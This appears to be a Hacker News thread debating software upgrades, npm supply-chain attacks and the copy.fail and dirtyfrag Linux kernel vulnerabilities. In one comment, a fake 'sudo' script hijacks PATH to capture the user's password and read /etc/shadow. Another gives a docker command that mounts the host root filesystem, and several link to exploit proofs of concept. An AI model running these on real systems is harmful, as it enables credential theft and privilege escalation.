For example, at one company I worked for, they created an ACL model for applications that essentially enforced rules like: “Application X in namespace A can communicate with me.” This ACL coordinated multiple technologies working together, including Kubernetes NetworkPolicies, Linkerd manifests with mTLS, and Entra ID application permissions. As a user, it was dead simple to use and abstracted away a lot of things i do not know that well.
The important part is not the specific implementation, but the mindset behind it.
An upgrade can both fix existing issues and introduce new ones. However, avoiding upgrades can create just as many problems — if not more — over time.
At the same time, I would argue that using software backed by a large community is even more important today, since bugs and vulnerabilities are more likely to receive attention, scrutiny, and timely fixes.
And yes, they still thought they were doing the right thing.
Anyway, the point of parent and me wasn't that it was considered to be a "mistake", but people thinking they "are doing the right thing".
As for the parent comment about not using the lockfile for the production build, that’s just incredibly incompetent.
Maybe they should hire someone who knows what they are doing. Contrary to the popular beliefs of backend engineers online, you also need some competency to do frontend properly.
In this case what’s needed is „npm ci“ instead of „npm install“ or better „pnpm install —frozen-lockfile“.
Pnpm will also do that automatically if the CI environment variable is set.
The grugbrain developer says, "I can use git-add to keep a version controlled copy of the library in my app's source tree with no extra steps after git-clone."
(Pop quiz: what problem were the creators of NPM's lockfile format trying to solve?)
When you are talking about checking your dependencies in the source tree, you are effectively pinning exact versions, and not using floating/tilde versioning syntax.
If you want a vendored deps model you can look at Yarn Plug and Play which does this via .zip files.
However, I would just stick with regular pnpm and installs.
Uh… no.
> setting up native binaries, or native modules linked against the specific Node version
So the majority of projects—those that don't use binary NodeJS modules—don't have a reason for sidestepping the primary VCS and going along with npm's shoddily designed overlay version control approach?
> However, I would just stick with regular pnpm and installs.
You're not answering the question. npm isn't bedrock, and pnpm certainly isn't. If you're going to introduce (mandate) the use of a tool in the workflow, you should be able to justify it by explaining your rationale for introducing it (and making everyone deal with the associated costs). You should at minimum be able to provide a lucid explanation of the tradeoffs. For good measure, you should be able to disprove the "NPM Null Hypothesis"; you should be able to state a straightforward answer to the question, "What problem is this supposed to be solving?"
this is on some ancient node 16 build i was trying to clean up ci for, so not very recent npm
In general, use of npm ci is usually sparsely documented - most node projects you can find just recommend using npm install during the setup, suggesting a failure in promoting it's availability (I only know of it because I got frustrated that the lockfile kept clogging up git commits whenever I added dependencies with what looked like auto-generated build-time junk).
Turns out there is no equivalent to “npm ci” that doesn’t clear node_modules first, and you can’t call npm install to simulate NPM ci behavior (sans clean).
I would count myself as a "frequent upgrader" - I admin a bunch of Ubuntu machines and typically set them to auto-update each night. However, I am aware of the risks of introducing new issues, but that's offset by the risks of not upgrading when new bugs are found and patched. There's also the issue of organisations that fall far behind on versions of software which then creates an even bigger problem, though this is more common with Windows/proprietary software as you have less control over that. At least with Linux, you can generally find ways to install e.g. old versions of Java that may be required for specific tools.
There's no simple one-size-fits-all and it depends on the organisation's pool of skills as to whether it's better to proactively upgrade or to reluctantly upgrade at a slower pace. In my experience, the bugs introduced by new versions of software are easier to fix/workaround than the various issues of old software versions.
Well, you critisize people who run the latest software here. Two counter-arguments:
1) If you don't upgrade frequently, you end up with super stable debian stuck on ... ancient software. This in turn means that many more recent software, won't work, unless you recompile a lot. I had this issue with mesa for instance, then needing a more recent LLVM, spirv-components and so forth. No chance to have that easily on debian, unless you control what you compile. On my local system here I run gtk2, gtk3 and gtk4 just fine. Good luck having that with debian for recent version; even debian sid is slow compared to, say, gentoo or arch(linux) or void(linux) here.
2) Even debian systems would be vulnerable to copy.fail. So that strategy is also not automatically better.
Personally I am among the frequent update folks. I use ruby scripts to automatically update to the latest, in hope that the people who write code are not incompetent. There is no guarantee that newer software is automatically always better; it is a trade-off. I don't have the time and resource for infinite security audits. I need to get things done and this approach, different to the "everything is scary" crowd, works super-well for me. I use a versioned AppDir approach on linux though, so I don't run into many issues of "can not upgrade because of same .so name issue", so I can conveniently switch to other versions as-is, including the kernel. (Excluding ABI differences and glibc, but for about 98% of the programs this works very well. I am also not alone with the get-everything-working approach, see xserver or gtk2-ng: https://github.com/X11Libre/xserver https://git.devuan.org/Daemonratte/gtk2-ng - granted, for the linux kernel this does not work that well ... I think we need better strategies for the linux kernel, things such as copy.fail should not be possible. I have no good solution here, AI will find many more exploits. No clue how we can prevent this or mitigate this more easily. I was surprised when the local instructor showed us how easy it is to use python for gaining superuser access as-is.)
Whether to do constant npm upgrades to keep the high-priority security issues count at zero (for what seems like about 15 minutes), or whether to hang back a bit to avoid catching the big one that everyone knows is coming real soon now.
Not enjoying npm at all.
Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.
This wasn't a nightmare wanting to happen, but an example of badly maintaned systems for the lowest common denominator.
Why is npm the only package ecosystem that has so many problems? What are the other package system owners doing better? Let’s start there, instead of blaming the victims.
Even worse are the “extension packs” that combine some normal things and one wonky thing nobody’s ever heard of…
Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
If a popular NPM package was compromised and included a copy.fail exploit, it would make lots of systems vulnerable to root privilege escalation.
The advice isn't just "update your kernel" because there is no update. The latest vulnerability (the one discovered after copy.fail) still has no fix.
I personally switched away from macOS with this being one of the reasons, after having realized brew will eventually compromise my system with their antics.
Code is cheap and is becoming cheaper by the day. We need new paradigms.
And the benefit is the obscurity of "no one will know how to exploit them"?
No, thanks.
I am worried that the sluggishness appeared about the same time on both devices
These days most exploits can not persist through a reboot due to secureboot and other bootchain attestations. In the boot process, everything loaded gets checksummed and compared to signed signatures from Apple, but this only helps at load time, not while the phone is running. Of course if the phone is not patched, the exploit could be reloaded, but this would require revising a malicious website or reopening a malicious bit of media.
Regular phone reboots are a security measure at this point.
https://news.ycombinator.com/item?id=47943499 - 44 CVEs trying to replace coreutils with a greenfield rust rewrite.
https://news.ycombinator.com/item?id=47921079 - Shoehorning AI stuff into Ubuntu is the future.
VM isolation would still be safe even with these kernel exploits.
For supply chain attacks that simply bide their time, or for dependencies which involve interacting with other subsystems, it's possible you miss a critical security update by doing this. Of course, the maintainers of the crates should yank known bad releases, but that's putting trust in a third-party that may have already been compromised.
What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".
People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.
Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
Behaviours matter more than OS security primitives.
If you have code execution, you can attack the OS.
This is exactly why some (including me) don't take these projects seriously. Like you claim to design a language for security, and this is how you tell me to install it????
curl|sh has the truncated shell script concern. It's possible to mitigate this concern. Did they? If so, it's no different from downloading and running any other installer.
Please grow a brain.
[0] https://news.ycombinator.com/item?id=47513932
[1] https://github.com/npm/cli/issues/8570
[2] https://socket.dev/blog/npm-introduces-minimumreleaseage-and...
As always, I know most of us work in IT, but things rarely are actually binary.
I don't remember where I read it, but it basically boils down to need vs want.
I've used that rule for deciding between a new car or used. A fancy vacuum or basic.
A shiny new gadget.
Bringing new things into the tech stack.
Picking a new tech stack.
It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far as 2017.
It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.
It's as if Windows had a vulnerability triggered by writing a certain string to a file. Copyfail is to write the string to a file. Dirtyfrag is to get another program to write the string to a file. When you fix the vulnerability - make sure nothing strange happens when the string is written - both go away at the same time.
What I want to say with that is fundamentally our world works because atleast most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.
I've studied security culture before and in most cases everything comes down to a sliding scale with security on one side and convenience/accessibility on the other, the more secure something is, the less accessible it is and vice versa.
[0] https://www.youtube.com/watch?v=LTI0SeyhAPA
The copyFail didn't, the dirtyfrag doesn't.
This copfail2 does modify /etc/passwd, but I can't `su - sick` as expected.
/s
I did try fixing the path to use nixos paths, but it was still unsuccessful. Did not really check further.
In general I agree, but I think these two vulns are 0day-y and pretty much every major distro is affected AFAIU, so there is perhaps slightly more potential than usual
The proper response from them and you, should be to make sure to have some isolatin between user space and root like gvisor.
It means you skip supply chain attacks but may miss fresh vulnerability patches too.
If you can't trust your update sources, you have bigger problems.
In my book, having unattended-upgrades or windows update run amok on your system is functionally worse than a rootkit.
It's a problem we have to live with for the sake of progress and for security updates. Every machine needs downtime for maintenance on a periodic, often-scheduled basis. It might cost time but avoiding updates is not a good plan.
Aside from dodgy updates that have to run as root to install, if you have passwordless sudo it's more dangerous than any broken package or local-only privilege escalation exploit. I'll wager many have it set up that way, because typing passwords is tiresome.
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p .local/bin/
cat <<EOF >.local/bin/sudo
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose: $ docker-compose.yml
services:
app:
image: node:alpine
volumes:
- .:/app
working_dir: /app
command: /bin/sh
$ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs. docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly. $ docker run -it -v.:/app -w /app node:alpine /bin/sh
/app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
/bin/sh: docker: not found
I've described attack from host user and isolating attacker with docker.It's quite different from PATH-injecting an already privileged user.
Also, these memory corruptions can likely be used as container escape primitives too. Albeit not easily.
It's a serious break of a security boundary. Yes, container layer adds defense, and normal unix security isn't perfect, but it should not allow this.
PoC attack on k8s [1] claims execution through sibling layers of kube-proxy, host filesystem access through /dev/ [2].
[1] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
[2] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...
It is regularly pointed out as a drawback by Android users (e.g. "I can't run that doomscrolling blocker in iOS"), but from a security-model perspective it was visionary back in 2008.
But problem is this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
The post in question points to dependency package managers however not system packages, such as NPM, which has pre and post build scripts, install scripts, etc.
6-19-2005
My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.
Sure we've just faced an acceleration phase and a wave of patches will follow before settling in. But where we used to find x zero-day per million LoC, we will now find 10x ZD/MLoC. [hopefully detection will become part of CI so that number may vary]
So, we will have more disasters waiting to happen. Assume that they will happen.
My #1 recommendation is to curate a list of the auth tokens that you use (keep the list, not the actual tokens in a central place...), and be ready to rotate them as automatically as possible. You already have backups. Know how to rotate all your credentials.
Write some scripts. Get ready. It will happen.
I'm not associated with the project in any way and am very much open to other suggestions, either as an alternative to LuLu or to complement it.
This makes no sense.
So, copy.fail refers to a linux kernel problem, yes? A local instructor showed it to us, e. g. by using python to become superuser.
Well ... does this mean that a computer system is useless, because of that bug? No. Besides, people can patch it already, so while that is indeed a huge bug as such, it does not mean it makes people's computer useless at all.
But, even ignoring this ... why would we now AVOID installing new software" for a bit? What rationale is given here? The rationale was given "because of ... uhm ... npm supply chain attacks":
"Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so."
Well, many computer systems won't even have npm installed. Besides, if they do, they should be well aware of npm having had issues for such a long time. left-pad is still the funniest one of all tims IMO, or among top three. copy.fail is not funny - it is almost so simple that it is stupid, which kind of makes this an epic fail indeed, and that AI found it also kind of means that skynet won. Humans won't find as many weaknesses as AI skynet will. But just because of such an exploit and npm sucking, why would this mean I should ... arbitrarily stop compiling any new software? THAT MAKES ABSOLUTELY NO SENSE AT ALL. That "rationale" is not a rationale. That is just an opinion, without any real argument to be had.
If the issue is serious, patch the linux kernel. End of story. No need to have a "moratorium" on installing new software. The "for a bit" makes no sense anymore than "for 50 days" or any other arbitrary number. xeiaso is not THINKING here.
I know there are extensions and proxies you can set up that do this, but it just seems like it should be built in to NPM directly (maybe it has, I haven't been up on Node programming in the last couple years).
It must have been a very quiet announcement because I just found out about it this week.
I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.
there's a secure option provided by the web - no build - scripts at the top / bottom of the page
they're executed in a secure sandbox
Once everyone takes the stance of waiting 2 weeks, we are all back to the same situation.
I don’t like the suggestion to “wait for others to be the unfortunate victims, so that I can benefit from their misfortune”.
Surely there’s a better way.
We’re not downloading new firmware and installing for a lot of things it’s all getting pulled in automatically.